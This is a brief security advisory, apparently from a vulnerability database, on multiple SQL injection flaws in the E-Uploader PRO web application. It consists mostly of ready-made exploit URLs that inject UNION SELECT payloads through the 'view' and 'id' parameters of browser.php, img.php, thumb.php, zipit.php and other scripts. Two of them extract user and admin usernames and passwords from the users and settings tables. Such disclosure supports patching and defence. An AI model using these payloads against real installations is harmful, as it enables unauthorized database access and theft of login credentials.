|
E-Uploader PRO 'id' Parameter Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues. The following examples are available: http://www.example.com/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,user,pass),3,4,5,6,7+from+users/* http://www.example.com/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,admin_user,admin_pass),3,4,5,6,7+from+settings/* http://www.example.com/[installdir]/img.php?id='+union+select+1,2,user()/* http://www.example.com/[installdir]/file.php?id='+union+select+1,2,3/* http://www.example.com/[installdir]/mail.php?id='+union+select+1,2,3/* http://www.example.com/[installdir]/thumb.php?id='+union+select+1,2,user()/* http://www.example.com/[installdir]/zip.php?id='+union+select+1,2,3/* http://www.example.com/[installdir]/zipit.php?id='+union+select+1,2,3,4,5,6,7/* |
|
|
Privacy Statement |